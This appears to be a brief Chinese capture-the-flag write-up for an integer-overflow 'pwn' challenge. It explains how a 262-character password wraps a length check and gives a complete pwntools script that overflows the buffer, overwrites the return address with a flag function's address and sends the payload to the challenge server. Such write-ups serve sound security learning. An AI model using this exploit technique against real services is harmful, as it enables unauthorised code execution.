文章目录
整形溢出原理
超过存储长度直接被丢弃
pwn int_overflow
0x14+0x4+4字节返回地址+234(或者235等等,只要最后字符个数在3+256~8+256之间就可以)=262个字符,可以通过if
import pwn
flag_addr = 0x0804868B
payload = ('x'*(0x14+0x4)).encode() + \
pwn.p32(flag_addr) + ('x'*234).encode()
r = pwn.remote("220.249.52.133", 44711)
r.sendlineafter("Your choice:", "1")
r.sendlineafter("your username:", "a")
r.recvuntil("your passwd:")
r.sendline(payload)
r.interactive()
注意kali下用命令python3 a.py